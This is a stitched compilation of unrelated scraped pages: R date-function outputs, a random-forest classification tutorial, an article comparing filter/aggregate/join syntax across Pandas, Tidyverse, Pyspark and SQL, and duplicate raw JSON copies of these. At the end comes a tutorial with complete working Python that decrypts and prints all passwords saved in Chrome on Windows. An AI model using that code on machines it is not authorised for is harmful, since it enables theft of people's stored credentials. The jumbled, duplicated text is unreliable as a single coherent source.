AddMonths(as.Date('2020/01/01'), 6)
[1] "2020-07-01"
AddMonths(as.Date('2020/06/01'), 6)
[1] "2020-12-01"
AddMonths(as.Date('2020/06/30'), 6)
[1] "2020-12-30"
AddMonths(as.Date('2020/01/01'), 12)
[1] "2021-01-01"
AddMonths(as.Date('2020/01/01'), 24)
[1] "2022-01-01"
AddMonths(as.Date('2020/01/01'), 36)
[1] "2023-01-01"
AddMonths(as.Date('2020/01/01'), 48)
[1] "2024-01-01"
AddMonths(as.Date('2020/01/01'), 120)
[1] "2030-01-01"
AddMonths(as.Date('2021/01/01'), 120)
[1] "2031-01-01"
AddMonths(as.Date('2021/01/01'), 500)
[1] "2062-09-01"
AddMonths(as.Date('2021/01/01'), 600)
[1] "2071-01-01"
AddMonths(as.Date('2021/01/01'), 1200)
[1] "2121-01-01"
AddMonths(as.Date('2021-01-01'), 8)
[1] "2021-09-01"
AddMonths(as.Date('2021-01-01'), 10)
[1] "2021-11-01"
AddMonths(as.Date('2021-01-01'), 20)
[1] "2022-09-01"
AddMonths(as.Date('2021-01-01'), 25)
[1] "2023-02-01"
AddMonths(as.Date('2021-01-01'), 16)
[1] "2022-05-01"
[ { "code": null, "e": 1557, "s": 1062, "text": "We have to deal with date data in time series analysis, also sometimes we have a time variable in data set that is recorded to perform another type of analysis. Depending on our objective, we need to process the data and the time variable is also converted into appropriate form that we are looking for. If we want to create a sequence of months from date data then we can do it by adding a month to each upcoming month. This can be easily done by using AddMonths function of DescTools package." }, { "code": null, "e": 1588, "s": 1557, "text": "Installing DescTools package −" }, { "code": null, "e": 2844, "s": 1588, "text": "install.packages(\"DescTools\")\nLoading DescTools package:\nlibrary(DescTools)\nAddMonths(as.Date('2020/01/31'), 1)\n[1] \"2020-02-29\"\nAddMonths(as.Date('2020/01/31'), 2)\n[1] \"2020-03-31\"\nAddMonths(as.Date('2020/01/31'), 3)\n[1] \"2020-04-30\"\nAddMonths(as.Date('2020/01/31'), 4)\n[1] \"2020-05-31\"\nAddMonths(as.Date('2020/01/31'), 6)\n[1] \"2020-07-31\"\nAddMonths(as.Date('2020/01/01'), 6)\n[1] \"2020-07-01\"\nAddMonths(as.Date('2020/06/01'), 6)\n[1] \"2020-12-01\"\nAddMonths(as.Date('2020/06/30'), 6)\n[1] \"2020-12-30\"\nAddMonths(as.Date('2020/01/01'), 12)\n[1] \"2021-01-01\"\nAddMonths(as.Date('2020/01/01'), 24)\n[1] \"2022-01-01\"\nAddMonths(as.Date('2020/01/01'), 36)\n[1] \"2023-01-01\"\nAddMonths(as.Date('2020/01/01'), 48)\n[1] \"2024-01-01\"\nAddMonths(as.Date('2020/01/01'), 120)\n[1] \"2030-01-01\"\nAddMonths(as.Date('2021/01/01'), 120)\n[1] \"2031-01-01\"\nAddMonths(as.Date('2021/01/01'), 500)\n[1] \"2062-09-01\"\nAddMonths(as.Date('2021/01/01'), 600)\n[1] \"2071-01-01\"\nAddMonths(as.Date('2021/01/01'), 1200)\n[1] \"2121-01-01\"\nAddMonths(as.Date('2021-01-01'),8)\n[1] \"2021-09-01\"\nAddMonths(as.Date('2021-01-01'),10)\n[1] \"2021-11-01\"\nAddMonths(as.Date('2021-01-01'),20)\n[1] \"2022-09-01\"\nAddMonths(as.Date('2021-01-01'),25)\n[1] \"2023-02-01\"\nAddMonths(as.Date('2021-01-01'),16)\n[1] \"2022-05-01\"" } ]
Classification with Random Forests in Python | by Sadrach Pierre, Ph.D. | Towards Data Science
The random forests algorithm is a machine learning method that can be used for supervised learning tasks such as classification and regression. The algorithm works by constructing a set of decision trees trained on random subsets of features. In the case of classification, the output of a random forest model is the mode of the predicted classes across the decision trees. In this post, we will discuss how to build random forest models for classification tasks in python.

Let's get started!

For our classification task, we will be working with the Mushroom Classification data set which can be found here. We will be predicting on a binary target that specifies whether a mushroom is poisonous or edible.

To start, let's import the pandas library and read our data into a data frame:

import pandas as pd

df = pd.read_csv("mushrooms.csv")

Let's print the shape of our data frame:

print("Shape: ", df.shape)

Next, let's print the columns in our data frame:

print(df.columns)

Now let's also look at the first five rows of data using the '.head()' method:

print(df.head())

The attribute information is as follows: we will be predicting the class for mushrooms, where the possible class values are 'e' for edible and 'p' for poisonous. The next thing we will do is convert each column into machine readable categorical variables:

df_cat = pd.DataFrame()
for i in list(df.columns):
    df_cat['{}_cat'.format(i)] = df[i].astype('category').copy()
    df_cat['{}_cat'.format(i)] = df_cat['{}_cat'.format(i)].cat.codes

Let's print the first five rows of the resulting data frame:

print(df_cat.head())

Next, let's define our features and our targets:

X = df_cat.drop('class_cat', axis = 1)
y = df_cat['class_cat']

Now let's import the random forests classifier from 'sklearn':

from sklearn.ensemble import RandomForestClassifier

Next, let's import 'KFold' from the model selection module in 'sklearn'. We will use 'KFold' to validate our model. Additionally, we will use the f1-score as our accuracy metric, which is the harmonic mean of the precision and recall: f1 = 2 * precision * recall / (precision + recall). Let's also initialize the 'KFold' object with two splits. Finally, we'll initialize a list that we will use to append our f1-scores:

from sklearn.model_selection import KFold
from sklearn.metrics import f1_score
import numpy as np

# shuffle=True is required for random_state to take effect
kf = KFold(n_splits=2, shuffle=True, random_state=42)
results = []

Next, let's iterate over the indices in our data and split our data for training and testing:

for train_index, test_index in kf.split(X):
    # use .iloc for positional indexing into the data frame
    X_train, X_test = X.iloc[train_index], X.iloc[test_index]
    y_train, y_test = y.iloc[train_index], y.iloc[test_index]

Within the for-loop we will define random forest model objects, fit to the different folds of training data, predict on the corresponding folds of test data, evaluate the f1-score at each test run and append the f1-scores to our 'results' list. Our model will use 100 estimators, which corresponds to 100 decision trees:

for train_index, test_index in kf.split(X):
    ...
    model = RandomForestClassifier(n_estimators = 100, random_state = 24)
    model.fit(X_train, y_train)
    y_pred = model.predict(X_test)
    results.append(f1_score(y_test, y_pred))

Finally, let's print the average performance of our model:

print("Accuracy: ", np.mean(results))

If we increase the number of splits to 5 we have:

kf = KFold(n_splits=5, shuffle=True, random_state=42)
...
print("Accuracy: ", np.mean(results))

I'll stop here, but I encourage you to play around with the data and code yourself. To summarize, in this post we discussed how to train a random forest classification model in python. We showed how to transform categorical feature values into machine readable categorical values.
Further, we showed how to split our data for training and testing, initialize our random forest model object, fit to our training data, and measure the performance of our model. I hope you found this post useful/interesting. The code in this post is available on GitHub. Thank you for reading!
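As a final illustrative step (my addition, building on the variables above), the last model trained in the loop can score a new row directly:

# score a single mushroom; the prediction is the 0/1 category code for the class
sample = X.iloc[[0]]  # one row, kept as a DataFrame
print(model.predict(sample))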
[ { "code": null, "e": 646, "s": 172, "text": "The random forests algorithm is a machine learning method that can be used for supervised learning tasks such as classification and regression. The algorithm works by constructing a set of decision trees trained on random subsets of features. In the case of classification, the output of a random forest model is the mode of the predicted classes across the decision trees. In this post, we will discuss how to build random forest models for classification tasks in python." }, { "code": null, "e": 665, "s": 646, "text": "Let’s get started!" }, { "code": null, "e": 879, "s": 665, "text": "For our classification task, we will be working with the Mushroom Classification data set which can be found here. We will be predicting on a binary target that specifies whether a mushroom is poisonous or edible." }, { "code": null, "e": 958, "s": 879, "text": "To start, let’s import the pandas library and read our data into a data frame:" }, { "code": null, "e": 1012, "s": 958, "text": "import pandas as pd df = pd.read_csv(\"mushrooms.csv\")" }, { "code": null, "e": 1053, "s": 1012, "text": "Let’s print the shape of our data frame:" }, { "code": null, "e": 1080, "s": 1053, "text": "print(\"Shape: \", df.shape)" }, { "code": null, "e": 1129, "s": 1080, "text": "Next, let’s print the columns in our data frame:" }, { "code": null, "e": 1147, "s": 1129, "text": "print(df.columns)" }, { "code": null, "e": 1226, "s": 1147, "text": "Now let’s also look at the first five rows of data using the ‘.head()’ method:" }, { "code": null, "e": 1243, "s": 1226, "text": "print(df.head())" }, { "code": null, "e": 1283, "s": 1243, "text": "The attribute information is as follows" }, { "code": null, "e": 1497, "s": 1283, "text": "We will be predicting the class for mushrooms where the possible class values are ‘e’ for edible and ‘p’ for poisonous. The next thing we will do is convert each column into machine readable categorical variables:" }, { "code": null, "e": 1680, "s": 1497, "text": "df_cat = pd.DataFrame()for i in list(df.columns): df_cat['{}_cat'.format(i)] = df[i].astype('category').copy() df_cat['{}_cat'.format(i)] = df_cat['{}_cat'.format(i)].cat.codes" }, { "code": null, "e": 1741, "s": 1680, "text": "Let’s print the first five rows of the resulting data frame:" }, { "code": null, "e": 1762, "s": 1741, "text": "print(df_cat.head())" }, { "code": null, "e": 1811, "s": 1762, "text": "Next, let’s define our features and our targets:" }, { "code": null, "e": 1873, "s": 1811, "text": "X = df_cat.drop('class_cat', axis = 1)y = df_cat['class_cat']" }, { "code": null, "e": 1936, "s": 1873, "text": "Now let’s import the random forests classifier from ‘sklearn’:" }, { "code": null, "e": 1988, "s": 1936, "text": "from sklearn.ensemble import RandomForestClassifier" }, { "code": null, "e": 2355, "s": 1988, "text": "Next, let’s import ‘KFold’ from the model selection module in ‘sklearn’. We will us ‘KFold’ to validate our model. Additionally, we will use the f1-score as our accuracy metric, which is the harmonic mean of the precision and recall. Let’s also initialize the “KFold” object with two splits. 
Finally, we’ll initialize a list that we will use to append our f1-scores:" }, { "code": null, "e": 2450, "s": 2355, "text": "from sklearn.model_selection import KFoldkf = KFold(n_splits=2, random_state = 42)results = []" }, { "code": null, "e": 2544, "s": 2450, "text": "Next, let’s iterate over the indices in our data and split our data for training and testing:" }, { "code": null, "e": 2692, "s": 2544, "text": "for train_index, test_index in kf.split(X): X_train, X_test = X[train_index], X[test_index] y_train, y_test = y[train_index], y[test_index]" }, { "code": null, "e": 3013, "s": 2692, "text": "Within the for-loop we will define random forest model objects, fit to the different folds of training data, predict on the corresponding folds of test data, evaluate the f1-score at each test run and append the f1-scores to our ‘results’ list. Our model will use 100 estimators, which corresponds to 100 decision trees:" }, { "code": null, "e": 3251, "s": 3013, "text": "for train_index, test_index in kf.split(X): ... model = RandomForestClassifier(n_estimators = 100, random_state = 24) model.fit(X_train, y_train) y_pred = model.predict(X_test) results.append(f1_score(y_test, y_pred))" }, { "code": null, "e": 3310, "s": 3251, "text": "Finally, let’s print the average performance of our model:" }, { "code": null, "e": 3348, "s": 3310, "text": "print(\"Accuracy: \", np.mean(results))" }, { "code": null, "e": 3398, "s": 3348, "text": "If we increase the number of splits to 5 we have:" }, { "code": null, "e": 3461, "s": 3398, "text": "kf = KFold(n_splits=3)...print(\"Accuracy: \", np.mean(results))" }, { "code": null, "e": 3544, "s": 3461, "text": "I’ll stop here but I encourage you to play around with the data and code yourself." } ]
Filter, Aggregate and Join in Pandas, Tidyverse, Pyspark and SQL | by Yu Zhou | Towards Data Science
One of the most popular questions asked by aspiring data scientists is which language they should learn for data science. The initial choices are usually between Python and R. There are already a lot of conversations to help make a language choice (here and here). Selecting an appropriate language is the first step, but I doubt most people end up using only one language. In my personal journey, I learned R first, then SQL, then Python, and then Spark. Now in my daily work, I use all of them because I find unique advantages in each of them (in terms of speed, ease of use, visualization and others). Some people do stay in only one camp (some Python people never think about learning R), but I prefer to use whatever is available to create my best data solutions, and speaking multiple data languages helps my collaboration with different teams.

As the State of Machine Learning points out, we face a challenge of supporting multiple languages in data teams. One downside of working across languages is that I confuse one with another, as they may have very similar syntax. Respecting the fact that we enjoy a data science ecosystem with multiple coexisting languages, I would love to write down three common data transformation operations in these four languages side by side, in order to shed light on how they compare at the syntax level. Putting syntax side by side also helps me synergize them better in my data science toolbox. I hope it helps you as well.

The data science landscape is expansive, so I decided to focus on the largest common denominator in this post. Without formal statistics to back it up, I take the following for granted: most data science work is on tabular data; the common data languages are SQL, Python, R and Spark (not Julia, C++, SAS, etc.).

SQL has a long list of dialects (Hive, MySQL, PostgreSQL, Cassandra and so on); I choose ANSI-standard SQL in this post. Pure Python and base R are capable of manipulating data, but I choose Pandas for Python and Tidyverse for R in this post. Spark has RDD and Dataframe; I choose to focus on Dataframe. Spark has APIs in Pyspark and Sparklyr; I choose Pyspark here, because the Sparklyr API is very similar to Tidyverse.

The three common data operations include filter, aggregate and join. These three operations allow you to cut and merge tables, derive statistics such as average and percentage, and get ready for plotting and modeling. As data wrangling consumes a high percentage of data work time, these three common data operations should account for a large percentage of data wrangling time.

Inclusion and exclusion are essential in data processing. We keep the relevant and discard the irrelevant. We can call inclusion and exclusion with one word: filter. Filter has two parts in tabular data. One is filtering columns and the other is filtering rows. Using the famous Iris data in this post, I list the filter operations in the four languages below.

Question: What is the sepal length and petal length of setosa flowers with petal width larger than 1?

# SQL
select Sepal_Length, Petal_Length from Iris
where Petal_Width > 1 and Species='setosa';

# Pandas
Iris[(Iris.Petal_Width > 1) & (Iris.Species=='setosa')][['Sepal_Length','Petal_Length']]

# Tidyverse
Iris %>% filter(Petal_Width > 1, Species=='setosa') %>%
  select(Sepal_Length, Petal_Length)

# Pyspark
Iris.filter((Iris.Petal_Width > 1) & (Iris.Species=='setosa')).select(Iris.Sepal_Length, Iris.Petal_Length)

Pandas uses brackets to filter columns and rows, while Tidyverse uses functions.
The Pyspark API was designed by borrowing the best from both Pandas and Tidyverse. As you can see here, the Pyspark operation shares similarities with both Pandas and Tidyverse. SQL is declarative as always, showing up with its signature "select columns from table where row criteria".

Creating summary statistics such as count, sum and average is essential to data exploration and feature engineering. When categorical variables are available, it is also very common to group summary statistics by certain categorical variables.

Question: How many sepal length records does each Iris species have in this data, and what is their average sepal length?

# SQL
select Species, count(Sepal_Length) as Sepal_Length_Count,
avg(Sepal_Length) as Sepal_Length_mean
from Iris group by Species;

# Pandas
aggregated = Iris.groupby(by='Species', as_index=False).agg({'Sepal_Length': ['mean','count']})
aggregated.columns = ['_'.join(tup).rstrip('_') for tup in aggregated.columns.values]

# Tidyverse
Iris %>% group_by(Species) %>%
  summarize(Sepal_Length_mean=mean(Sepal_Length), Count=n())

# Pyspark
from pyspark.sql import functions as F
Iris.groupBy(Iris.Species).agg(
    F.mean(Iris.Sepal_Length).alias('sepal_length_mean'),
    F.count(Iris.Sepal_Length).alias('sepal_length_count'))

This example is a good one to show why I get confused by the four languages. There are four slightly different ways to write "group by": use group by in SQL, use groupby in Pandas, use group_by in Tidyverse and use groupBy in Pyspark. (In Pyspark, both groupBy and groupby work, as groupby is an alias for groupBy. groupBy looks more authentic, as it is used more often in the official documentation.)

In terms of aggregation, Python is very different here. One, it uses a dictionary to specify aggregation operations. Two, it by default uses the group-by variable as the index, and you may have to deal with a MultiIndex (hence the column-flattening line above).

One hallmark of big data work is integrating multiple data sources into one source for machine learning and modeling, so the join operation is a must-have. There is a list of joins available: left join, inner join, outer join, anti left join and others. A left join is used in the following example.

Question: Given a table Iris_preference that has my preference on each species, can you join this preference table with the original table for later preference analysis?

# SQL
select a.*, b.* from Iris a
left join Iris_preference b
on a.Species=b.Species;

# Pandas
pd.merge(Iris, Iris_preference, how='left', on='Species')

# Tidyverse
left_join(Iris, Iris_preference, by="Species")

# Pyspark
Iris.join(Iris_preference, ['Species'], "left_outer")

It is really amazing that we have many ways to express the same intention, in programming languages and in natural languages.

Language abundance is a blessing and a curse. It may not be a bad idea for the community to standardize the APIs for the common data operations across the languages in the future, which could eliminate friction and increase portability. As of now, I survey the filter, aggregate and join operations in Pandas, Tidyverse, Pyspark and SQL to highlight the syntax nuances we deal with most often on a daily basis. The side-by-side comparisons above can not only serve as a cheat sheet to remind me of the language differences but also help me with my transitions among these tools. I have a more concise version of this cheat sheet at my git repository here. Additionally, you may find other language-specific cheat sheets helpful; they are from Pandas.org, R Studio and DataCamp.
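To tie the three operations together, here is a self-contained Pandas sketch that runs filter, aggregate and join end to end. A toy frame stands in for the Iris data, and the preference table is made up for illustration:

import pandas as pd

iris = pd.DataFrame({
    'Species': ['setosa', 'setosa', 'virginica'],
    'Sepal_Length': [5.1, 4.9, 6.3],
    'Petal_Length': [1.4, 1.5, 6.0],
    'Petal_Width': [1.2, 0.2, 2.5]})
preference = pd.DataFrame({
    'Species': ['setosa', 'virginica'],
    'Preference': ['love', 'like']})

# filter rows, then keep two columns
print(iris[iris.Petal_Width > 1][['Sepal_Length', 'Petal_Length']])

# aggregate: mean and count of sepal length per species
agg = iris.groupby(by='Species', as_index=False).agg({'Sepal_Length': ['mean', 'count']})
agg.columns = ['_'.join(tup).rstrip('_') for tup in agg.columns.values]
print(agg)

# left join on the key column
print(pd.merge(iris, preference, how='left', on='Species'))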
Data Wrangling with Pandas: link

Data Wrangling with dplyr and tidyr: link

Python for Data Science Pyspark: link

If you want to add extra pairs of data operations into my cheat sheet, let's connect!
[ { "code": null, "e": 1015, "s": 172, "text": "One of the most popular question asked by inspiring data scientists is which language they should learn for data science. The initial choices are usually between Python and R. There are already a lot of conversations to help make a language choice (here and here). Selecting an appropriate language is the first step, but I doubt most people end up using only one language. In my personal journey, I learned R first, then SQL, then Python, and then Spark. Now in my daily work, I use all of them because I find unique advantages in each of them (in terms of speed, ease of use, visualization and others). Some people do stay in only one camp (some Python people never think about learning R), but I prefer to use what available to create my best data solutions, and speaking multiple data languages help my collaboration with different teams." }, { "code": null, "e": 1627, "s": 1015, "text": "As the State of Machine Learning points out, we face a challenge of supporting multiple languages in data teams, one down side of working cross languages is that I confuse one with another as they may have very similar syntax. Respecting the fact that we enjoy a data science ecosystem with multiple coexisting languages, I would love to write down three common data transformation operations in these four languages side by side, in order to shed light on how they compare at syntax level. Putting syntax side by side also helps me synergize them better in my data science toolbox. I hope it helps you as well." }, { "code": null, "e": 1932, "s": 1627, "text": "Data science landscape is expansive, I decide to focus on the largest common denominator in this post. Without formal statistics to back up, I take the following for granted: most data science work is on tabular data; the common data languages are SQL, Python, R and Spark (not Julia, C++, SAS and etc.)." }, { "code": null, "e": 2351, "s": 1932, "text": "SQL has a long list of dialects (hive, mysql, postgresql, casandra and so on), I choose ANSI-standard SQL in this post. Pure Python and Base R is capable of manipulating data, however I choose Pandas for Python and Tidyverse for R in this post. Spark has RDD and Dataframe, I choose to focus on Dataframe. Spark has API in Pyspark and Sparklyr, I choose Pyspark here, because Sparklyr API is very similar to Tidyverse." }, { "code": null, "e": 2729, "s": 2351, "text": "The three common data operations include filter, aggregate and join.These three operations allow you to cut and merge tables, derive statistics such as average and percentage, and get ready for plotting and modeling. As data wrangling consumes a high percentage of data work time, these three common data operations should account for a large percentage of data wrangling time." }, { "code": null, "e": 3090, "s": 2729, "text": "Inclusion and exclusion are essential in data processing. We keep the relevant and discard the irrelevant. We can call inclusion and exclusion with one word: filter. Filter has two parts in tabular data. One is filtering columns and the other is filtering rows. Using the famous Iris data in this post, I list the filter operations in the four languages below." 
}, { "code": null, "e": 3588, "s": 3090, "text": "Question: What is the sepal length, petal length of Setosa with petal width larger than 1 ?# SQLselect Sepal_Length, Petal_Length from Iris where Petal_Width > 1 and Species=’setosa’;# PandasIris[(Iris.Petal_Width > 1) & (Iris.Species==’setosa’)][[‘Sepal_length’,’Petal_Length’]]# TidyverseIris %>% filter(Petal_Width > 1, Species==’setosa’) %>% select(Sepal_Length, Petal_Length)# PysparkIris.filter((Iris.Petal_Width > 1) & (Iris.Species==’setosa’)).select(Iris.Sepal_Length, Iris.Petal_Length)" }, { "code": null, "e": 3953, "s": 3588, "text": "Pandas uses brackets to filter columns and rows, while Tidyverse uses functions. Pyspark API is determined by borrowing the best from both Pandas and Tidyverse. As you can see here, this Pyspark operation shares similarities with both Pandas and Tidyverse. SQL is declarative as always, showing up with its signature “select columns from table where row criteria”." }, { "code": null, "e": 4198, "s": 3953, "text": "Creating summary statistics such as count, sum and average are essential to data exploration and feature engineering. When categorical variables are available, it is also very common to group summary statistics by certain categorical variables." }, { "code": null, "e": 4916, "s": 4198, "text": "Question: How many sepal length records does each Iris species have in this data and what is their average sepal length ?# SQLselect Species, count(Sepal_Length) as Sepal_Length_Count, avg(Sepal_Length) as Sepal_Length_mean from Iris group by Species;# Pandasaggregated=Iris.groupby(by=’Species’,as_index=False).agg({‘Sepal_Length’: [‘mean’,’count’]})aggregated.columns = [‘_’.join(tup).rstrip(‘_’) for tup in temp1.columns.values]# TidyverseIris %>% group_by(Species) %>% summarize(Sepal_Length_mean=mean(Sepal_Length), Count=n())# Pysparkfrom pyspark.sql import functions as FIris.groupBy(Iris.species).agg(F.mean(Iris.sepal_length).alias(‘sepal_length_mean’),F.count(Iris.sepal_length).alias(‘sepal_length_count’))" }, { "code": null, "e": 5321, "s": 4916, "text": "This example is a good one to tell why the I get confused by the four languages. There are four slightly different ways to write “group by”: use group by in SQL, use groupby in Pandas, use group_by in Tidyverse and use groupBy in Pyspark (In Pyspark, both groupBy and groupby work, as groupby is an alias for groupBy in Pyspark. groupBylooks more authentic as it is used more often in official document)." }, { "code": null, "e": 5536, "s": 5321, "text": "In terms of aggregation, Python is very different here. One, it uses a dictionary to specify aggregation operations. Two, it by default uses the group by variable as index, and you may have to deal with multiindex." }, { "code": null, "e": 5843, "s": 5536, "text": "One hallmark of big data work is integrating multiple data sources into one source for machine learning and modeling, therefore join operation is the must-have one. There is a list of joins available: left join, inner join, outer join, anti left join and others. Left join is used in the following example." 
}, { "code": null, "e": 6279, "s": 5843, "text": "Question: given a table Iris_preference that has my preference on each species, can you join this preference table with the original table for later preference analysis?# SQLselect a.*, b.* from Iris a left join Iris_preference b on a.Species=b.Species;# Pandaspd.merge(Iris, Iris_preference, how=’left’, on=’Species’)# Tidyverseleft_join(Iris, Iris_preference, by=”Species”)# PysparkIris.join(Iris_preference,[‘Species’],”left_outer”)" }, { "code": null, "e": 6405, "s": 6279, "text": "It is really amazing that we have many ways to express the same intention, in programming languages and in natural languages." }, { "code": null, "e": 7178, "s": 6405, "text": "Language abundance is a blessing and curse. It may not be a bad idea for the community to standardize the APIs for the common data operations cross the languages in the future, which could eliminate frictions and increase portability. As of now, I survey the filter, aggregate and join operations in Pandas, Tidyverse, Pyspark and SQL to highlight the syntax nuances we deal with most often on a daily basis. The side by side comparisons above can not only serve as a cheat sheet to remind me the language differences but also help me with my transitions among these tools. I have a more concise version of this cheat sheet at my git repository here. Additionally, you may find other language specific cheat sheets helpful, they are from Pandas.org, R Studio and DataCamp." }, { "code": null, "e": 7211, "s": 7178, "text": "Data Wrangling with Pandas: link" }, { "code": null, "e": 7253, "s": 7211, "text": "Data Wrangling with dplyr and tidyr: link" }, { "code": null, "e": 7291, "s": 7253, "text": "Python for Data Science Pyspark: link" } ]
How to Extract Chrome Passwords in Python? - GeeksforGeeks
21 Apr, 2021

In this article, we will discuss how to extract all passwords stored in the Chrome browser.

Note: This article is for users who use Chrome on Windows. If you are a Mac or Linux user, you may need to make some changes to the given path, while the rest of the Python program will remain the same.

Now, let's install some important libraries which we need to write a Python program through which we can extract Chrome passwords.

pip install pycryptodome
pip install pypiwin32

Before we extract the passwords directly from Chrome, we need to define some useful functions that will help our main function.

First Function

def chrome_date_and_time(chrome_data):

    # Chrome stores timestamps as microseconds
    # elapsed since January 1, 1601
    # This will return a datetime.datetime object
    return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)

The chrome_date_and_time() function is responsible for converting Chrome's date format into a human-readable date and time format.

Chrome's date and time format looks like this:

'year-month-date hr:mins:seconds.milliseconds'

Example:

2020-06-01 10:49:01.824691

Second Function

def fetching_encryption_key():

    # local_computer_directory_path will
    # look like this below
    # C: => Users => <Your_Name> => AppData =>
    # Local => Google => Chrome => User Data =>
    # Local State
    local_computer_directory_path = os.path.join(
        os.environ["USERPROFILE"], "AppData", "Local", "Google",
        "Chrome", "User Data", "Local State")

    with open(local_computer_directory_path, "r", encoding="utf-8") as f:
        local_state_data = f.read()
        local_state_data = json.loads(local_state_data)

    # decoding the encryption key using base64
    encryption_key = base64.b64decode(
        local_state_data["os_crypt"]["encrypted_key"])

    # remove the Windows Data Protection API (DPAPI) prefix
    encryption_key = encryption_key[5:]

    # return decrypted key
    return win32crypt.CryptUnprotectData(
        encryption_key, None, None, None, 0)[1]

The fetching_encryption_key() function obtains and decodes the AES key used to encrypt the passwords. It is saved as a JSON file in "C:\Users\<Your_PC_Name>\AppData\Local\Google\Chrome\User Data\Local State". This key is what we will later use to decrypt the stored passwords.

Third Function

def password_decryption(password, encryption_key):

    try:
        iv = password[3:15]
        password = password[15:]

        # generate cipher
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)

        # decrypt password
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
        except:
            return "No Passwords"

password_decryption() takes the encrypted password and the AES key as parameters and returns the decrypted, human-readable form of the password.

Below is the implementation.
Python3

import os
import json
import base64
import sqlite3
import shutil
import win32crypt
from Crypto.Cipher import AES
from datetime import datetime, timedelta


def chrome_date_and_time(chrome_data):

    # Chrome stores timestamps as microseconds
    # elapsed since January 1, 1601
    # This will return a datetime.datetime object
    return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)


def fetching_encryption_key():

    # local_computer_directory_path will look
    # like this below
    # C: => Users => <Your_Name> => AppData =>
    # Local => Google => Chrome => User Data =>
    # Local State
    local_computer_directory_path = os.path.join(
        os.environ["USERPROFILE"], "AppData", "Local", "Google",
        "Chrome", "User Data", "Local State")

    with open(local_computer_directory_path, "r", encoding="utf-8") as f:
        local_state_data = f.read()
        local_state_data = json.loads(local_state_data)

    # decoding the encryption key using base64
    encryption_key = base64.b64decode(
        local_state_data["os_crypt"]["encrypted_key"])

    # remove the Windows Data Protection API (DPAPI) prefix
    encryption_key = encryption_key[5:]

    # return decrypted key
    return win32crypt.CryptUnprotectData(encryption_key,
                                         None, None, None, 0)[1]


def password_decryption(password, encryption_key):

    try:
        iv = password[3:15]
        password = password[15:]

        # generate cipher
        cipher = AES.new(encryption_key, AES.MODE_GCM, iv)

        # decrypt password
        return cipher.decrypt(password)[:-16].decode()
    except:
        try:
            return str(win32crypt.CryptUnprotectData(password, None,
                                                     None, None, 0)[1])
        except:
            return "No Passwords"


def main():
    key = fetching_encryption_key()
    db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
                           "Google", "Chrome", "User Data", "default",
                           "Login Data")
    filename = "ChromePasswords.db"

    # work on a copy, since Chrome locks the original database
    shutil.copyfile(db_path, filename)

    # connecting to the database
    db = sqlite3.connect(filename)
    cursor = db.cursor()

    # the 'logins' table has the data
    cursor.execute(
        "select origin_url, action_url, username_value, password_value, "
        "date_created, date_last_used from logins order by date_last_used")

    # iterate over all rows
    for row in cursor.fetchall():
        main_url = row[0]
        login_page_url = row[1]
        user_name = row[2]
        decrypted_password = password_decryption(row[3], key)
        date_of_creation = row[4]
        last_usage = row[5]

        if user_name or decrypted_password:
            print(f"Main URL: {main_url}")
            print(f"Login URL: {login_page_url}")
            print(f"User name: {user_name}")
            print(f"Decrypted Password: {decrypted_password}")
        else:
            continue

        if date_of_creation != 86400000000 and date_of_creation:
            print(f"Creation date: {str(chrome_date_and_time(date_of_creation))}")

        if last_usage != 86400000000 and last_usage:
            print(f"Last Used: {str(chrome_date_and_time(last_usage))}")

        print("=" * 100)

    cursor.close()
    db.close()

    try:
        # remove the copied db file from
        # the local computer as well
        os.remove(filename)
    except:
        pass


if __name__ == "__main__":
    main()

Output:

For the above code, we followed these steps:

First, we use the previously defined function fetching_encryption_key() to obtain the encryption key.

Then copy the SQLite database at "C:\Users\<Your_PC_Name>\AppData\Local\Google\Chrome\User Data\default\Login Data", where the saved password data is stored, into the current directory and establish a connection with it. This is because the original database file is locked while Chrome is running.

With the help of the cursor object, we execute the SELECT SQL query on the 'logins' table, ordered by date_last_used.
Traverse all the login rows, decrypting each password into human-readable form and formatting date_created and date_last_used into readable dates.

Finally, with the help of print statements, we print all the saved credentials extracted from Chrome.

Delete the copy of the database from the current directory.
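As a quick sanity check of the timestamp format described earlier, the conversion can be exercised in both directions. Note that to_chrome_timestamp is a hypothetical helper written here for illustration; chrome_date_and_time is the function defined above:

from datetime import datetime, timedelta

def to_chrome_timestamp(dt):
    # inverse of chrome_date_and_time: microseconds
    # elapsed since January 1, 1601
    return int((dt - datetime(1601, 1, 1)) / timedelta(microseconds=1))

ts = to_chrome_timestamp(datetime(2020, 6, 1, 10, 49, 1, 824691))
print(ts)                        # a large Chrome-style integer
print(chrome_date_and_time(ts))  # round-trips to 2020-06-01 10:49:01.824691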
[ { "code": null, "e": 23901, "s": 23873, "text": "\n21 Apr, 2021" }, { "code": null, "e": 23994, "s": 23901, "text": "In this article, we will discuss how to extract all passwords stored in the Chrome browser. " }, { "code": null, "e": 24197, "s": 23994, "text": "Note: This article is for users who use Chrome on Windows. If you are a Mac or Linux user, you may need to make some changes to the given path, while the rest of the Python program will remain the same." }, { "code": null, "e": 24328, "s": 24197, "text": "Now, Let’s install some important libraries which we need to write a python program through which we can extract Chrome Passwords." }, { "code": null, "e": 24375, "s": 24328, "text": "pip install pycryptodome\npip install pypiwin32" }, { "code": null, "e": 24504, "s": 24375, "text": "Before we extract the password directly from Chrome, we need to define some useful functions that will help our main functions. " }, { "code": null, "e": 24519, "s": 24504, "text": "First Function" }, { "code": null, "e": 24757, "s": 24519, "text": "def chrome_date_and_time(chrome_data):\n\n # Chrome_data format is \n # year-month-date hr:mins:seconds.milliseconds\n # This will return datetime.datetime Object\n return datetime(1601, 1, 1) + timedelta(microseconds=chrome_data)" }, { "code": null, "e": 24889, "s": 24757, "text": "The chrome_date_and_time() function is responsible for converting Chrome’s date format into a human-readable date and time format. " }, { "code": null, "e": 24933, "s": 24889, "text": "Chrome Date and time format look like this:" }, { "code": null, "e": 24980, "s": 24933, "text": "'year-month-date hr:mins:seconds.milliseconds'" }, { "code": null, "e": 24989, "s": 24980, "text": "Example:" }, { "code": null, "e": 25016, "s": 24989, "text": "2020-06-01 10:49:01.824691" }, { "code": null, "e": 25032, "s": 25016, "text": "Second Function" }, { "code": null, "e": 25979, "s": 25032, "text": "def fetching_encryption_key():\n \n # Local_computer_directory_path will\n # look like this below\n # C: => 